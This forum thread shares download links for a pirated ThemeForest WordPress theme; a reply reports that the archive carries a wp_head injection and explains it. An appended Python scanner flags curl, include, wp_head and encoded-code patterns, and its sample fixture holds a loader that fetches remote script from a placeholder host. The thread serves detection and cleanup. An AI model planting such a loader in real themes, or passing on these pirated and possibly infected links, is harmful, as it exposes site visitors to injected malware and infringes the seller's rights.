11-04-2012, 11:16 AM (This post was last modified: 11-11-2012 03:35 PM by vietguysvn.)
Post: #1
[GET] Folio Two v1.4 – ThemeForest WordPress Edition
Folio Two WordPress theme is an advanced portfolio focused on creative freelancers and agencies, a practical and usable WordPress theme designed with HTML5 + CSS3 and using jQuery to enhance an awesome user experience.

This template is a powerful tool based on RESPONSIVE DESIGN, adaptive to any kind of device. The screen size will not be a problem to show your favorite works.

If you are a DRIBBBLE player/fan you can show your latest shots in an original and easy way.

Just select your best works and begin to show your talent!


Sale page
Code:
http://themeforest.net/item/folio-two-wordpress-edition/2351272

Download
Code:
https://www.dropbox.com/s/h265p6908a9o855/folio-two_v1.4.rar
Code:
http://uploadmirrors.com/download/0OFFWNWB/folio-two.zip
or visit here to download more themes

Code:
http://themes.nnkl.org/folio-two/


VirusTotal:
Normalized URL: folio-two_v1.4.rar
Detection ratio: 0 / 31
Analysis date: 2012-11-04 01:14:38 UTC ( 0 minutes ago )

https://www.virustotal.com/url/eca32b3d7...351991387/
11-09-2012, 07:50 PM (This post was last modified: 11-09-2012 07:50 PM by simey69.)
Post: #2
RE:
THE ABOVE SHARE IS INFECTED
The theme has been tampered with and a wp_head injection infection added.

I've cleaned it, safe version below:

Code:
http://uploadmirrors.com/download/0OFFWNWB/folio-two.zip
VT: Clean 0/43
Code:
https://www.virustotal.com/file/ef3c3a5a2953f495c0249fdd06b9a2fdb9ea4d5cbe7a014a913b8419c6170c1e/analysis/1352454470/

Cheers,
Si
11-10-2012, 12:53 PM (This post was last modified: 11-10-2012 12:58 PM by vietguysvn.)
Post: #3
RE:
Really, thanks simey69. wp_head is header.php? I checked header.php in my file and your file and can't see any difference there.
Can you share some experience on how to know that a file is infected, so I can fix it before sharing it?
11-10-2012, 07:15 PM
Post: #4
RE:
Hi,

No, it injects code into part of the wp mechanism using the add_action('wp_head', ...) function call.

Typically the functions.php is attacked, either with the injection code or to include another file that has the injection code.

In this case, it's the include-a-file method, as the functions.php has this added:
Code:
include'includes/dribbble/class.php';

The file class.php then has the curl call routine and the wp_head injection. This fetches external code from another domain and injects it into the header part of your output to visitors.

This may contain links, CPA scams and other malware/trojans/exploits.

Cheers,
Si
11-10-2012, 08:36 PM (This post was last modified: 11-10-2012 09:02 PM by vietguysvn.)
Post: #5
RE:
Hi,
Does that mean I can find another link to domains, or a part of the injection code, in the file functions.php or another folder, right?
Now, if I scan the zip file in VirusTotal, it's possible to find that. Because I have just rechecked my zip file (direct upload of xxx.rar to VirusTotal, not a file link like dropbox.com/xxxx.rar), it shows the same results as your safe version, but includes/dribbble/ has the class.php file.
SHA256: c4a3c9fd2e0fd8b3b90a634eaac8063581c0c6761054db275ac1675fc3ae7176
File name: folio-two_v1.4.rar
Detection ratio: 0 / 43
Analysis date: 2012-11-10 10:28:30 UTC ( 1 minute ago )

A simple way is to check whether some files were created at a time different from the other files in the folder (like almost all files are 04/22/2012 and one file is 10/13/2012, so that file is maybe not normal), right?

How can I check theme files to find injection code inside before sharing, because scanning the zip file in VirusTotal is not enough? It does not show that problem in the class.php file like you did :(
Really, thanks for your help, simey69
11-10-2012, 10:01 PM
Post: #6
RE:
Hi,

Mostly always look for new files or recently changed files compared to the actual file date (these script kiddies usually infect and share the same or next day, so can be obvious that way)
- as you say, the rest of the files may look a lot older compared to the infected files.

When searching through, look for curl functions or includes
- they usually make the offsite code domain look like it's linked to jquery in some way, don't be fooled by that
- it will usually look very similar to the code in that class.php file - curl functions and the wp_head later

Virustotal or other virus scanners ignore this type of infection, as it looks like genuine code

Sometimes they will try to encode it. If you see encoded code amongst normal code, then treat it as a risk and decode it.

I'm working on a script scanner, but my time right now is so very short, but it is about 60% completed - it will scan for these annoying infections.

Cheers,
Si
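
The checks described in posts #4 and #6 (includes, curl functions, the wp_head hook, encoded code, and files dated later than the rest of the theme), written out as an added example; it is not part of the original thread and is not simey69's scanner. The pattern labels, the 30-day gap and the three-file sample theme written by `build_sample` are constructed assumptions.

```python
import os, re, statistics, sys

# Heuristics named in the thread; labels and thresholds are this example's choices.
PATTERNS = {
    "wp_head hook": re.compile(r"add_action\s*\(\s*['\"]wp_head['\"]", re.I),
    "curl call": re.compile(r"\bcurl_(init|setopt|exec)\s*\(", re.I),
    "include/require": re.compile(r"\b(include|require)(_once)?\b\s*\(?\s*['\"]", re.I),
    "encoded code": re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I),
}

def scan_theme(root, gap_days=30):
    """Return {relative path: [reasons]} for files that deserve a manual read."""
    paths = [os.path.join(d, n) for d, _, names in os.walk(root) for n in names]
    mtimes = {p: os.path.getmtime(p) for p in paths}
    median = statistics.median(mtimes.values()) if mtimes else 0
    findings = {}
    for path, mtime in mtimes.items():
        reasons = []
        # A file much newer than the bulk of the archive was likely added later.
        if mtime - median > gap_days * 86400:
            reasons.append("newer than rest of theme")
        if path.lower().endswith(".php"):
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            reasons += [label for label, rx in PATTERNS.items() if rx.search(text)]
        if reasons:
            findings[os.path.relpath(path, root).replace(os.sep, "/")] = reasons
    return findings

def build_sample(root):
    """Write a constructed three-file theme: two old files, one newer loader."""
    old, new = 1335052800, 1350086400  # 2012-04-22 and 2012-10-13 UTC
    sample = {
        "style.css": ("body { margin: 0; }", old),
        "functions.php": ("<?php include'includes/dribbble/class.php';", old),
        "includes/dribbble/class.php": (
            "<?php function ldr() { $c = curl_init('http://placeholder.invalid/j.js');"
            " echo curl_exec($c); } add_action('wp_head', 'ldr');", new),
    }
    for rel, (body, ts) in sample.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.utime(path, (ts, ts))

if __name__ == "__main__":
    for rel, why in sorted(scan_theme(sys.argv[1]).items()):
        print(f"{rel}: {', '.join(why)}")
```

Pass the directory of the extracted theme as the only argument. Legitimate themes also use include and curl, so a hit marks a file to read, not a verdict.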
11-11-2012, 03:49 AM
Post: #7
RE:
Error, loading work?



